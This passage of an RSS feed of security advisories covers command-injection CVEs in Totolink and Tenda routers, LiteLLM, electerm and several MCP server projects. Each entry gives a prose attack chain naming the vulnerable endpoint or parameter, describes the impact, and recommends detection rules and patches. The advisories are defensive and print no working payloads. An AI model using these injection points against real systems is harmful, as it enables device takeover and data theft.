<p>Successful exploitation of CVE-2026-7538 grants attackers complete control over the affected Totolink A8000RU router. This can lead to a variety of malicious outcomes, including unauthorized access to the local network, data theft, and the use of the router as a node in a botnet for DDoS attacks or other malicious campaigns. Given the availability of a public exploit, widespread exploitation is possible if devices are not promptly patched or protected.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches or firmware updates for Totolink A8000RU version 7.1cu.643_b20200521 to remediate CVE-2026-7538.</li>
<li>Implement network intrusion detection system (IDS) rules to detect malicious HTTP requests targeting the <code>/cgi-bin/cstecgi.cgi</code> endpoint with suspicious payloads in the <code>proto</code> argument.</li>
<li>Deploy the Sigma rule <code>Detect Totolink A8000RU Command Injection Attempt</code> to your SIEM to identify exploitation attempts based on suspicious HTTP requests.</li>
<li>Monitor web server logs for unusual activity or errors related to the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>totolink</category></item><item><title>Tenda HG3 Router Command Injection Vulnerability (CVE-2026-7096)</title><link>https://feed.craftedsignal.io/briefs/2024-01-tenda-hg3-command-injection/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-tenda-hg3-command-injection/</guid><description>A command injection vulnerability (CVE-2026-7096) exists in the Tenda HG3 2.0 300003070 router, allowing remote attackers to execute arbitrary OS commands by manipulating the 'fmgpon_loid' argument in the 'formgponConf' function of the '/boaform/admin/formgponConf' file due to insufficient input validation.</description><content:encoded><![CDATA[<p>A critical command injection vulnerability, identified as CVE-2026-7096, affects Tenda HG3 2.0 300003070 routers. The vulnerability resides in the &lsquo;formgponConf&rsquo; function within the &lsquo;/boaform/admin/formgponConf&rsquo; file. An attacker can exploit this flaw by manipulating the &lsquo;fmgpon_loid&rsquo; argument. Successful exploitation allows a remote attacker to execute arbitrary operating system commands on the affected device. Given the public availability of an exploit, Tenda HG3 devices are at immediate risk of compromise. This poses a significant threat as attackers can potentially gain full control of the router, compromise connected networks, and exfiltrate sensitive information.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Tenda HG3 2.0 300003070 router with an exposed web interface.</li>
<li>The attacker crafts a malicious HTTP POST request targeting the &lsquo;/boaform/admin/formgponConf&rsquo; endpoint.</li>
<li>The attacker injects a payload containing OS commands into the &lsquo;fmgpon_loid&rsquo; parameter of the POST request.</li>
<li>The Tenda HG3 router&rsquo;s web server processes the request without proper input validation of the &lsquo;fmgpon_loid&rsquo; parameter.</li>
<li>The injected OS command is executed by the router&rsquo;s operating system with the privileges of the web server process.</li>
<li>The attacker gains remote code execution on the Tenda HG3 router.</li>
<li>The attacker may establish a reverse shell to maintain persistent access or download further malicious payloads.</li>
<li>The attacker can then pivot to internal networks, exfiltrate data, or use the compromised router for other malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7096 grants attackers the ability to execute arbitrary OS commands on the Tenda HG3 router. This can lead to complete compromise of the device, allowing attackers to modify router settings, intercept network traffic, and potentially gain access to connected devices on the local network. Given the widespread use of Tenda routers in home and small business environments, a successful attack could impact thousands of users. The vulnerability&rsquo;s high CVSS score of 8.8 underscores the severity and potential for widespread damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Detect Tenda HG3 Command Injection Attempt&rdquo; to your SIEM to identify exploitation attempts by monitoring HTTP POST requests to &lsquo;/boaform/admin/formgponConf&rsquo; with suspicious commands in the &lsquo;fmgpon_loid&rsquo; parameter.</li>
<li>Implement network intrusion detection system (NIDS) rules to detect malicious payloads in HTTP POST requests targeting the vulnerable endpoint, as described in the &ldquo;Attack Chain&rdquo; section.</li>
<li>While no specific IOCs are provided, analyze network traffic and web server logs for unusual activity originating from or targeting Tenda HG3 routers.</li>
<li>Monitor web server logs for HTTP POST requests to /boaform/admin/formgponConf (described in Attack Chain step 2).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>router</category><category>tenda</category></item><item><title>MiroFish Command Injection Vulnerability (CVE-2026-7058)</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-mirofish-command-injection/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-mirofish-command-injection/</guid><description>A command injection vulnerability exists in 666ghj MiroFish version 0.1.2 via the SimulationIPCClient.send_command function, allowing remote attackers to execute arbitrary commands.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-7058, affects 666ghj MiroFish up to version 0.1.2. The vulnerability resides in the <code>SimulationIPCClient.send_command</code> function within the <code>backend/app/services/simulation_ipc.py</code> file, specifically within the Inter-Process Communication component. This flaw allows a remote attacker to inject and execute arbitrary commands on the system. Public disclosure of the exploit exists, increasing the risk of exploitation. The vendor was notified, but has not yet responded. This vulnerability poses a significant risk as it allows for complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable MiroFish instance running version 0.1.2 or earlier.</li>
<li>Attacker crafts a malicious command injection payload.</li>
<li>Attacker sends a request to the <code>SimulationIPCClient.send_command</code> function via the Inter-Process Communication mechanism.</li>
<li>The vulnerable function <code>SimulationIPCClient.send_command</code> fails to properly sanitize the attacker-supplied input.</li>
<li>The unsanitized input is passed to a system call.</li>
<li>The system executes the injected command with the privileges of the MiroFish process.</li>
<li>The attacker gains arbitrary code execution on the server.</li>
<li>The attacker can then perform actions such as installing malware, exfiltrating data, or pivoting to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this command injection vulnerability (CVE-2026-7058) allows an attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data breaches, denial of service, or further lateral movement within the network. Given the public availability of the exploit, organizations using MiroFish 0.1.2 or earlier are at high risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply appropriate input validation and sanitization to the <code>SimulationIPCClient.send_command</code> function to prevent command injection.</li>
<li>Monitor web server logs for suspicious requests targeting the <code>backend/app/services/simulation_ipc.py</code> endpoint (see rules below).</li>
<li>Deploy the Sigma rules provided to detect potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>ipc</category></item><item><title>mcp-dnstwist OS Command Injection Vulnerability (CVE-2026-7443)</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-mcp-dnstwist-command-injection/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-mcp-dnstwist-command-injection/</guid><description>An OS command injection vulnerability exists in BurtTheCoder's mcp-dnstwist version 1.0.4 and earlier due to improper handling of the Request argument in the fuzz_domain function within src/index.ts, potentially allowing remote attackers to execute arbitrary commands.</description><content:encoded><![CDATA[<p>CVE-2026-7443 describes an OS command injection vulnerability affecting BurtTheCoder&rsquo;s mcp-dnstwist, a tool potentially used for detecting and preventing typosquatting attacks. The vulnerability resides in versions up to 1.0.4. The affected function, <code>fuzz_domain</code>, located in the <code>src/index.ts</code> file of the MCP Interface component, is susceptible to command injection. An attacker can manipulate the Request argument to inject arbitrary OS commands. This is a remotely exploitable vulnerability, meaning an attacker can trigger it over a network connection. Public exploits are available, increasing the risk of widespread exploitation. The vulnerability was reported to the project maintainers, but no response or patch has been released as of this writing.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable instance of mcp-dnstwist running version 1.0.4 or earlier.</li>
<li>The attacker crafts a malicious HTTP request targeting the MCP Interface component.</li>
<li>The crafted request includes a payload designed to exploit the <code>fuzz_domain</code> function in <code>src/index.ts</code>.</li>
<li>The malicious payload manipulates the Request argument, injecting OS commands.</li>
<li>The <code>fuzz_domain</code> function, without proper sanitization, executes the injected OS commands.</li>
<li>The attacker gains arbitrary code execution on the server hosting mcp-dnstwist.</li>
<li>The attacker leverages the initial access to escalate privileges or move laterally within the network.</li>
<li>The attacker achieves their final objective, such as data exfiltration or system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary OS commands on the system hosting mcp-dnstwist. This could lead to complete system compromise, data breaches, or denial-of-service conditions. Given that mcp-dnstwist might be used in security-sensitive environments, a successful attack could have significant impact. The lack of a patch and the availability of public exploits increase the likelihood of exploitation.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Since no patch is available, immediately discontinue use of mcp-dnstwist versions up to 1.0.4.</li>
<li>Monitor network traffic for suspicious requests targeting mcp-dnstwist instances by deploying the Sigma rule <code>Detect Suspicious mcp-dnstwist Requests</code> to your SIEM.</li>
<li>If continued use is unavoidable, implement strict input validation and sanitization on the Request argument passed to the <code>fuzz_domain</code> function in <code>src/index.ts</code>. However, this is not a substitute for patching the underlying vulnerability.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category></item><item><title>LiteLLM Authenticated Command Execution via MCP stdio Test Endpoints</title><link>https://feed.craftedsignal.io/briefs/2024-01-litellm-rce/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-litellm-rce/</guid><description>Authenticated users with low-privilege API keys could execute arbitrary commands on the host running LiteLLM via the `/mcp-rest/test/connection` and `/mcp-rest/test/tools/list` endpoints, by submitting a server configuration including command execution parameters.</description><content:encoded><![CDATA[<p>LiteLLM versions 1.74.2 through 1.83.6 are vulnerable to authenticated command execution. Two endpoints, <code>POST /mcp-rest/test/connection</code> and <code>POST /mcp-rest/test/tools/list</code>, intended for previewing MCP server configurations, allowed any authenticated user to execute arbitrary commands on the proxy host. This was possible because the endpoints accepted a full server configuration in the request body, including the <code>command</code>, <code>args</code>, and <code>env</code> fields used by the stdio transport, without proper role checks. An attacker could exploit this vulnerability by using a low-privilege API key to send a crafted request containing malicious commands, leading to command execution with the privileges of the proxy process. The vulnerability was patched in version 1.83.7 by enforcing the <code>PROXY_ADMIN</code> role for these endpoints.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the LiteLLM proxy with a valid, but low-privilege, API key.</li>
<li>Attacker crafts a malicious JSON payload containing a server configuration intended for the stdio transport. The payload includes the <code>command</code>, <code>args</code>, and <code>env</code> fields, which specify the command to be executed, its arguments, and environment variables, respectively.</li>
<li>Attacker sends a <code>POST</code> request to either the <code>/mcp-rest/test/connection</code> or <code>/mcp-rest/test/tools/list</code> endpoint, with the malicious JSON payload in the request body.</li>
<li>The LiteLLM proxy receives the request and, due to the vulnerability, attempts to connect to the supplied server configuration.</li>
<li>The proxy spawns the supplied command as a subprocess on the proxy host, using the privileges of the proxy process.</li>
<li>The attacker-supplied command executes arbitrary code on the host.</li>
<li>The attacker gains control of the proxy host with the privileges of the LiteLLM proxy.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the host running the LiteLLM proxy. Since the vulnerability can be exploited with a low-privilege API key, this significantly broadens the attack surface. Depending on the privileges of the proxy process, this could lead to full system compromise, data exfiltration, or denial of service. The lack of specific victim count or sector targeting information in the advisory suggests a broad potential impact across various deployments of LiteLLM.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade LiteLLM to version 1.83.7 or later to remediate the vulnerability (see Patches).</li>
<li>As a temporary workaround, block <code>POST</code> requests to the <code>/mcp-rest/test/connection</code> and <code>/mcp-rest/test/tools/list</code> endpoints at your reverse proxy or API gateway (see Workarounds).</li>
<li>Monitor web server logs for <code>POST</code> requests to <code>/mcp-rest/test/connection</code> and <code>/mcp-rest/test/tools/list</code> endpoints, looking for suspicious <code>command</code>, <code>args</code>, and <code>env</code> parameters in the request body (see rules below).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>rce</category><category>litellm</category><category>command-injection</category></item><item><title>Electerm Command Injection Vulnerability via runLinux Function</title><link>https://feed.craftedsignal.io/briefs/2024-01-electerm-command-injection/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-electerm-command-injection/</guid><description>A command injection vulnerability exists in electerm's install.js due to insufficient validation in the runLinux() function, allowing attackers to execute arbitrary commands by manipulating remote release metadata.</description><content:encoded><![CDATA[<p>A critical command injection vulnerability has been identified in Electerm, specifically affecting users who install the application via <code>npm install -g electerm</code> on Linux systems. The vulnerability resides within the <code>runLinux()</code> function in <code>github.com/elcterm/electerm/npm/install.js</code>. This function lacks proper validation when appending remote version strings into an <code>exec(&quot;rm -rf ...&quot;)</code> command. An attacker capable of controlling the remote release metadata (e.g., version string, release name) served by Electerm&rsquo;s update server could exploit this flaw to execute arbitrary system commands. This could lead to tampering with local files and a complete compromise of development or runtime assets. This vulnerability affects Electerm versions prior to 3.3.8.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains control over the Electerm update server or performs a man-in-the-middle attack.</li>
<li>The attacker crafts malicious release metadata, including a crafted version string containing command injection payloads.</li>
<li>A user on a Linux system executes <code>npm install -g electerm</code> to install or update Electerm.</li>
<li>The <code>install.js</code> script fetches the malicious release metadata from the compromised update server.</li>
<li>The <code>runLinux()</code> function appends the attacker-controlled version string directly into an <code>exec(&quot;rm -rf ...&quot;)</code> command.</li>
<li>The <code>exec()</code> function executes the command, resulting in arbitrary command execution with the privileges of the user running <code>npm install</code>.</li>
<li>The attacker can then tamper with local files, install backdoors, or escalate privileges.</li>
<li>The attacker achieves complete system compromise, potentially exfiltrating sensitive data or using the compromised system as a pivot point.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows attackers to execute arbitrary system commands on the victim&rsquo;s machine. This can lead to complete system compromise, including unauthorized access to sensitive data, installation of malware, and further propagation of the attack within the network. Given the nature of <code>npm install</code>, developers are primarily at risk. The impact could be significant for development environments.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the following rule to detect command injection attempts within npm installations referencing the electerm package: <code>Electerm NPM install Command Injection</code>.</li>
<li>Monitor network traffic for connections to unexpected or suspicious update servers that could be serving malicious Electerm release metadata using network connection logs.</li>
<li>While the vulnerability is patched in later versions, ensure users are aware of the risks associated with running older versions of Electerm (<code>&lt; 3.3.8</code>).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>electerm</category><category>npm</category></item><item><title>Aider-MCP Command Injection Vulnerability (CVE-2026-7316)</title><link>https://feed.craftedsignal.io/briefs/2024-01-aider-mcp-command-injection/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aider-mcp-command-injection/</guid><description>A command injection vulnerability (CVE-2026-7316) exists in eiliyaabedini aider-mcp, allowing remote attackers to execute arbitrary commands by manipulating the working_dir/editable_files argument in the aider_mcp.py file.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-7316, has been discovered in eiliyaabedini aider-mcp up to commit 667b914301aada695aab0e46d1fb3a7d5e32c8af. The vulnerability resides within an unspecified function of the <code>aider_mcp.py</code> file, specifically related to the <code>code_with_ai</code> component. An attacker can exploit this flaw by manipulating the <code>working_dir/editable_files</code> argument, leading to arbitrary command execution on the affected system. The exploit has been publicly disclosed, increasing the risk of exploitation. The aider-mcp project employs a rolling release model, which complicates identifying specific affected versions.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A remote attacker identifies an instance of aider-mcp running with accessible <code>aider_mcp.py</code> code.</li>
<li>The attacker crafts a malicious payload containing OS commands, targeting the <code>working_dir/editable_files</code> argument of the vulnerable function within <code>aider_mcp.py</code>.</li>
<li>The attacker sends the crafted payload to the aider-mcp instance through a network request, potentially via HTTP or another supported protocol.</li>
<li>The vulnerable function in <code>aider_mcp.py</code> processes the attacker-supplied <code>working_dir/editable_files</code> argument without proper sanitization or validation.</li>
<li>The injected OS commands within the <code>working_dir/editable_files</code> argument are executed by the aider-mcp instance.</li>
<li>The attacker gains arbitrary command execution on the server, allowing them to perform actions such as reading sensitive files, modifying system configurations, or installing malware.</li>
<li>The attacker may establish persistence by creating a new user account or modifying startup scripts.</li>
<li>The attacker further compromises the system or pivots to other systems in the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data theft, or denial of service. Given the public disclosure of the exploit, systems running vulnerable versions of aider-mcp are at significant risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events for commands being executed with a parent process associated with aider-mcp to detect potential command injection attempts using the <code>AiderMCPCommandInjection</code> Sigma rule.</li>
<li>Inspect web server logs for suspicious requests containing unusual characters or command sequences in the <code>working_dir</code> or <code>editable_files</code> parameters that may indicate command injection attempts.</li>
<li>While specific version information is unavailable, attempt to identify and patch any instances of aider-mcp using indicators of compromise or behavioral detections until a patched version is released.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>aider-mcp</category></item><item><title>GitPilot-MCP Command Injection Vulnerability (CVE-2026-6980)</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-gitpilot-command-injection/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-gitpilot-command-injection/</guid><description>A command injection vulnerability (CVE-2026-6980) in Divyanshu-hash GitPilot-MCP up to version 9ed9f153ba4158a2ad230ee4871b25130da29ffd allows remote attackers to execute arbitrary commands by manipulating the 'command' argument in the repo_path function of main.py, and public exploit code is available.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-6980, has been discovered in the GitPilot-MCP project by Divyanshu-hash. The vulnerability affects versions up to 9ed9f153ba4158a2ad230ee4871b25130da29ffd. Attackers can exploit this flaw by manipulating the <code>command</code> argument passed to the <code>repo_path</code> function within the <code>main.py</code> file. This manipulation enables remote command execution on the affected system. Publicly available exploit code exists, increasing the risk of exploitation. The vendor was notified, but did not respond. This vulnerability poses a significant risk to systems running GitPilot-MCP, potentially leading to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a GitPilot-MCP instance running a vulnerable version (&lt;= 9ed9f153ba4158a2ad230ee4871b25130da29ffd).</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>repo_path</code> function in <code>main.py</code>.</li>
<li>Within the HTTP request, the attacker injects a command payload into the <code>command</code> argument. This payload is designed to execute arbitrary commands on the server.</li>
<li>The GitPilot-MCP application processes the request without proper sanitization of the <code>command</code> argument.</li>
<li>The vulnerable <code>repo_path</code> function executes the injected command using a system call (e.g., <code>os.system()</code> or similar).</li>
<li>The injected command executes with the privileges of the GitPilot-MCP application user, potentially allowing for escalated privileges if the application runs as a privileged user.</li>
<li>The attacker gains arbitrary code execution on the server.</li>
<li>The attacker can then perform various malicious activities, such as installing malware, stealing sensitive data, or pivoting to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-6980 allows a remote attacker to execute arbitrary commands on the affected system. The impact of this vulnerability is high, as it could lead to complete system compromise, data breaches, and further malicious activity within the network. Since public exploit code is available, the risk of widespread exploitation is increased. The lack of vendor response further exacerbates the issue, leaving users vulnerable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect web server logs for suspicious requests targeting <code>main.py</code> with unusual characters or command-like syntax in the <code>command</code> parameter, and deploy the &ldquo;GitPilot-MCP Command Injection Attempt&rdquo; Sigma rule to detect exploitation attempts.</li>
<li>Monitor process creation events for unexpected processes spawned by the GitPilot-MCP application, using the &ldquo;GitPilot-MCP Suspicious Child Process&rdquo; Sigma rule to identify potentially malicious activity.</li>
<li>Implement input validation and sanitization for all user-supplied input, especially the <code>command</code> argument in the <code>repo_path</code> function, to prevent command injection attacks.</li>
<li>Apply any available patches or updates for GitPilot-MCP as soon as they are released to address the vulnerability.</li>
<li>Consider deploying a web application firewall (WAF) to filter out malicious requests targeting the <code>repo_path</code> function.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>web-application</category><category>cve</category></item><item><title>FastlyMCP Command Injection Vulnerability (CVE-2026-7220)</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-fastly-mcp-command-injection/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-fastly-mcp-command-injection/</guid><description>A command injection vulnerability (CVE-2026-7220) exists in jackwrichards FastlyMCP allowing remote attackers to execute arbitrary OS commands by manipulating the command argument in the fastly-mcp.mjs file.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-7220, has been discovered in jackwrichards FastlyMCP up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620. The vulnerability resides within the <code>fastly-mcp.mjs</code> file of the <code>fastly_cli Tool</code> component. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands by manipulating the <code>command</code> argument. The exploit is publicly known and actively usable. Given FastlyMCP&rsquo;s rolling release model, specific affected versions are unavailable, increasing the difficulty of patching. This vulnerability poses a significant risk as it can lead to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a vulnerable instance of FastlyMCP running a version up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>fastly-mcp.mjs</code> file.</li>
<li>The malicious request includes a manipulated <code>command</code> argument containing OS command injection payloads.</li>
<li>The FastlyMCP application processes the request, passing the attacker-controlled <code>command</code> argument to an underlying OS command execution function without proper sanitization.</li>
<li>The injected OS command is executed by the server with the privileges of the FastlyMCP application.</li>
<li>The attacker gains arbitrary code execution on the server, enabling further malicious activities.</li>
<li>The attacker may then establish persistence via web shells or by modifying system configurations.</li>
<li>Ultimately, the attacker achieves complete control over the system, potentially leading to data theft, service disruption, or further lateral movement within the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7220 allows attackers to execute arbitrary OS commands on the affected system. This can lead to full system compromise, potentially resulting in data breaches, service disruption, and lateral movement to other systems within the network. The lack of specific versioning information due to the rolling release model makes identifying and patching vulnerable instances challenging, potentially increasing the number of victims.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for suspicious requests targeting <code>fastly-mcp.mjs</code> with unusual parameters in the query string to detect potential exploitation attempts (see the Sigma rule <code>Detect FastlyMCP Command Injection Attempt</code>).</li>
<li>Implement input validation and sanitization for the <code>command</code> argument in <code>fastly-mcp.mjs</code> to prevent command injection, though patching is preferable.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Process Execution via FastlyMCP</code> to identify potential malicious process execution originating from FastlyMCP.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>cve-2026-7220</category><category>fastly-mcp</category></item><item><title>choieastsea simple-openstack-mcp OS Command Injection Vulnerability (CVE-2026-7066)</title><link>https://feed.craftedsignal.io/briefs/2024-01-simple-openstack-mcp-command-injection/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-simple-openstack-mcp-command-injection/</guid><description>The choieastsea simple-openstack-mcp application is vulnerable to OS command injection via the exec_openstack function in server.py, allowing remote attackers to execute arbitrary commands.</description><content:encoded><![CDATA[<p>A critical vulnerability, identified as CVE-2026-7066, has been discovered in choieastsea simple-openstack-mcp up to version 767b2f4a8154cca344344b9725537a58399e6036. This vulnerability resides within the <code>exec_openstack</code> function of the <code>server.py</code> file. Due to insufficient input sanitization, a remote attacker can inject arbitrary OS commands. The exploit is publicly available, increasing the risk of exploitation. The vendor utilizes rolling releases, so specific affected versions are difficult to pinpoint. The project has been notified of the vulnerability but has not yet addressed it. This vulnerability poses a significant risk to systems running the affected software.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable instance of choieastsea simple-openstack-mcp running a version up to 767b2f4a8154cca344344b9725537a58399e6036.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>server.py</code> endpoint responsible for handling <code>exec_openstack</code> function calls.</li>
<li>Within the HTTP request, the attacker injects OS commands into a parameter that is processed by the <code>exec_openstack</code> function without proper sanitization.</li>
<li>The <code>server.py</code> script receives the crafted request and passes the attacker-controlled input directly to a shell interpreter, such as <code>os.system()</code> or <code>subprocess.Popen()</code>.</li>
<li>The injected OS commands are executed with the privileges of the user running the simple-openstack-mcp application.</li>
<li>The attacker gains arbitrary code execution on the server, allowing them to perform actions such as installing malware, creating new user accounts, or accessing sensitive data.</li>
<li>The attacker may then use the compromised server as a pivot point to further compromise the internal network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7066 allows a remote attacker to execute arbitrary OS commands on the affected system. This can lead to full system compromise, data theft, and potential disruption of services. Given the nature of OpenStack environments, this could impact multiple virtual machines and cloud resources.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Examine web server logs for requests targeting <code>server.py</code> with unusual parameters or command-like syntax, which can indicate exploitation attempts. Implement the first Sigma rule provided.</li>
<li>Deploy the second Sigma rule to detect suspicious processes spawned by the web server that may be the result of command injection.</li>
<li>Monitor network connections originating from the server running simple-openstack-mcp for unusual outbound traffic to external IPs which might signal data exfiltration or C2 communication after a successful exploit using the third Sigma rule.</li>
<li>Apply input validation and sanitization to the <code>exec_openstack</code> function within <code>server.py</code> to prevent command injection.</li>
<li>While specific patch information is unavailable, closely monitor the choieastsea simple-openstack-mcp project for updates addressing CVE-2026-7066.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>openstack</category></item></channel></rss>